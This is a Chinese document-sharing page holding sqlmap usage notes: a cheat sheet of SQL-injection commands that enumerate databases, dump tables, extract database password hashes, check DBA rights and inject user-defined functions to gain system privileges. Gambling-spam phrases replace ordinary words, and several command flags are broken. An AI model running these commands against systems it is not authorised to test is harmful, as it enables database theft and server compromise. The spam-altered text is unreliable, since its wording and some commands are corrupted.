sqlmap使用笔记[中文].pdf

  1. 1、本文档共4页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
Sqlmap 必威体育精装版测试文档 Email:linuxseclab@ 测试许多款 sql 注入工具 最终还是发现 sqlmap 最为强悍 谁用谁知道! 赶紧抛弃掉手上一大堆 sql 注入工具吧 : ) 测试环境:ubuntu 10.10 windows 7(x64) sqlmap/1.0-dev (r4405) 如使用过程中出错 请使用下面最近更新的稳定版本: /c0adthmqf1 更新升级 : sqlmap -update svn checkout /sqlmap/trunk/sqlmap sqlmap-dev 帮助: sqlmap -h 官方必威体育精装版文档:/doc/README.html ******************基本步骤*************** sqlmap -u http://url/news?id=1 --cu ent-use #获取当前用户名称 sqlmap -u /news?id=1 --cu ent-db #获取当前数据库名称 sqlmap -u /news?id=1 --tables -D db_name #列表名 sqlmap -u http://url/news?id=1 --columns -T tablename users-D db_name -v 0 #列字段 sqlmap -u http://url/news?id=1 --dump -C column_name -T table_name -D db_name -v 0 #获取字段内容 ******************信息获取****************** sqlmap -u http://url/news?id=1 --smart --level 3 --users # smart 智能 level 执行测试等级 sqlmap -u http://url/news?id=1 --dbms Mysql --users # dbms 指定数据库类型 sqlmap -u http://url/news?id=1 --users #列数据库用户 sqlmap -u http://url/news?id=1 --dbs#列数据库 sqlmap -u http://url/news?id=1 --passwords #数据库用户密码 sqlmap -u http://url/news?id=1 --passwords-U root -v 0 #列出指定用户数据库密码 sqlmap -u http://url/news?id=1 --dump -C password,user,id -T tablename -D db_name --start 1 --stop 20 #列出指定字段,列出 20 条 sqlmap -u http://url/news?id=1 --dump-all -v 0 #列出所有数据库所有表 sqlmap -u http://url/news?id=1 --privileges #查看权限 sqlmap -u http://url/news?id=1 --privileges -U root #查看指定用户权限 sqlmap -u http://url/news?id=1 --is-dba -v 1 #是否是数据库管理员 sqlmap -u http://url/news?id=1 --roles #枚举数据库用户角色 sqlmap -u http://url/news?id=1 --udf-inject #导入用户自定义函数(获取系统权限!) sqlmap -u http://url/news?id=1 --dump-all --exclude-sysdbs -v 0 #列出当前库所有表 sqlmap -u http://url/news?id=1 --union-cols #union 查询表记录 sqlmap -u http://url/news?id=1 --cookie COOKIE_VALUE #cookie 注入 sqlmap -u http://url/news?id=1 -b #获取banne 信息 sqlmap -u http://url/news?id=1 --data id=3 #post 注入 sqlmap -u http://url/news?id=1 -v

文档评论(0)

yjz0327 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档